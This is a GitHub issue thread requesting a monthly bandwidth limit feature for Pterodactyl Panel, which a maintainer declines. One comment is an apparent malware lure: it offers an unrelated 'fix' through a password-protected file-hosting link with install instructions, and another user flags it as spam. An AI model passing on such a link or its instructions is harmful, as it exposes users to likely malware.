### ISSUE TITLE
Traffic limit.

### ISSUE THREAD

**Issue by ghost** [pterodactyl/panel#5202]
### Is there an existing feature request for this?

- [X] I have searched the existing issues before opening this feature request.

### Describe the feature you would like to see.

i would like a feture where i could limit my client's servers trafic, for example 500gb per month.

### Describe the solution you'd like.

A trafic limit added where it suspends a server if it runs out of trafic, it should also show an message on the suspension screen like *Trafic limit hit for this month*

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by QuintenQVD0** [comment]
Spamm do not downloas that ^^^

**Comment by rowansc1** [comment]
This was an existing issue - #3884 which was closed. 

I'll leave this open and allow for Matt to comment if they want to implement it as its been 2 years since that post was closed.

**Comment by matthewpi** [comment]
There really isn't an easy way for us to add a feature like this and I don't really see a good reason to add it.

If clients using a lot of bandwidth is an issue for you, use something else to monitor their traffic.
